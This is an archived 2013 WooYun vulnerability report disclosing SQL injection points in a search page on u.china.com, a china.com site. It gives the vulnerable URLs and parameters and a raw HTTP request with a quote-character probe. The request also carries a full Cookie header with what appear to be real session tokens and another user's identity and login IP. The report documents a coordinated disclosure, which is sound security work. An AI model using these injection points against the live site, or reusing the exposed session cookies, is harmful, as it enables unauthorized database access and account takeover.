当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-047152

漏洞标题:中华网某站点多处注入sql injection

相关厂商:中华网

漏洞作者: 剑无名

提交时间:2013-12-27 12:40

修复时间:2014-02-10 12:40

公开时间:2014-02-10 12:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-27: 细节已通知厂商并且等待厂商处理中
2013-12-31: 厂商已经确认,细节仅向厂商公开
2014-01-10: 细节向核心白帽子及相关领域专家公开
2014-01-20: 细节向普通白帽子公开
2014-01-30: 细节向实习白帽子公开
2014-02-10: 细节向公众公开

简要描述:

刷的不好意思了....主要真的是注入点茫茫多啊。

详细说明:

注入点1、http://u.china.com/account/find.php?_a=search_more&city_id=810100
注入参数city_id
注入点2、http://u.china.com/account/find.php?_a=search_more&username=%27&usermail=
username和usermail都是猪肉点。归结来说就是都是搜索框的注入点。其余自查吧

QQ图片20131227122346.jpg


和上面的一样都是要登陆的注射液给其中的一个注射液代码

GET /account/find.php?_a=search_more&city_id=810100%27 HTTP/1.1
Host: u.china.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: vjuids=337db4518.1432e49d17b.0.d9c66b3aae2328; vjlast=1388051026.1388117366.13; area=0571; wdcid=6ecf6e0a9b8718e1; __auc=8d956eeb1432ead774dddedfe58; nickname=gainover; lastlogindate=2013-12-27; lastlogintime=02:00:07; lastloginip=183.157.191.154; bindMobile=0@; CP_USER=iySF1rmQ45HNopM0nb3fhmTeDapm8Mi6zIpsuaQNIsLAKS-dJOxxUxhIdlV8wKN7NyChh20yep79eRMzwp1sblaRu1ga%2FYRnwoceuXshD3vyzWCDTZTS28y49-Dp0ddO6%2FI0hV7-hVuGiVETnXqh2dNOMIq7bSTCSiwDvk1bJTBERHSDY1IFj5O3D4lHrCABfI%2FEURVaEJ0HzjH0OsC2aPXkAJ3wXAwjrkXK1dkogC4iC44IuLq2ow%3D%3D; CP_USERINFO=XPSgpSN8qpvtfhRe4iMyqiw5cK-771d%2FMfxGjYOOzpQ%2FCfDvh4cl%2FmDp6IZyLRinJueXkUC3gLWVPArzV8xUYSAXQvSHCSoLSAoaJgJ6BpaGLWR2kbEN239-rAs8NMaCMZ6FPhnnHb0KSey72pe-5Zq3Lj346RKSU4wPP%2FoCIyagpF0iEV9CxDO0KeV6woRY9pX8ujFT4wp26VCS1Z1Kd5edCl1sIib8Z%2FzfPo%2FhfRvBA78rN3P-CgnzLeTmCMruLSCl1JZo6lDHUkAmmDwv0bt7TKvfjnk5Hj43BC0eIuhUePd0iVR0MVz0oKUjfKqbTKF7ctzcuUH01WSA4TF-djH8Ro2Djs6UciwAFMspykfD2x%2FraTEaJKqwjD89cOe-zLj34OnR105BET-coxgO2v-OpFfIcV8k0YBfLY40TtrxU8HRwap2e7UuuLKojHr%2FmrPz7HcC4l%2FmMnRWUN3dkDKpb3ACOd-n; CP_USERSCORE=jg2Ky4OCJfZsmgDylcvCcU01s5-pOqSMkKRy2mYSdTd0JJ7dOENvccevdYmUJhGP%2F1sU81ghyZQvRW7kRTRa%2F2VlKw8R-pJZbsreKKo3gDBmPHzd2zVRXqtQLPQxw77z3kGnLsl5sagIHoaZNdWCtk98NyrREKQsph4rniiV58pSI2fW%2FYoFaA%3D%3D; CP_BLOG=%2520%26%2520%26%2520%26%2520%26%2520%264fae9fb4cd7fc658f95844e51d8fbda0; china_variable=jpEe7N32pYz8SAjCjL8fnh2eLZiI1D/EC6dYmS6/lLUOPrHJGj-IxLIHbACvhNcaC9z3Z8pi2hxfVmzYZ1QpxyhUPyUBIZ1VEUguGIy6y/UwURH4-bcav0UAbLlVQc2InMJ0qN-y7QU=; china_login_userID=gainover; sns_cp_user=iySF1rmQ45HNopM0nb3fhmTeDapm8Mi6zIpsuaQNIsLAKS-dJOxxUxhIdlV8wKN7NyChh20yep79eRMzwp1sblaRu1ga%2FYRnwoceuXshD3vyzWCDTZTS28y49-Dp0ddO6%2FI0hV7-hVuGiVETnXqh2dNOMIq7bSTCSiwDvk1bJTBERHSDY1IFj5O3D4lHrCABfI%2FEURVaEJ0HzjH0OsC2aPXkAJ3wXAwjrkXK1dkogC4iC44IuLq2ow%3D%3D; sns_login_date=2013-12-27; sns_uid=10702650; sns_hash=4069c79ad53ba569055fc929ddf11881; sns_imhash=NLoZQ8u0aHBi2aiTYYYVie7%252FQ0ctKLtjWzKwEq%252BpH8Cok8WTG74pL3OJQdZ0wAsbT%252FMaHnlGXOQ%253D
Connection: keep-alive
Cache-Control: max-age=0

漏洞证明:

sql injection proof

QQ图片20131227121439.jpg

QQ图片20131227121914.jpg


这个站点已经被我猪栏了,不找它了

修复方案:

gainover我对不起你啊

版权声明:转载请注明来源 剑无名@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-12-31 09:15

厂商回复:

已经与http://www.wooyun.org/bugs/wooyun-2013-047105一并通报中华网信息化主管部门领导和工作人员。

最新状态:

暂无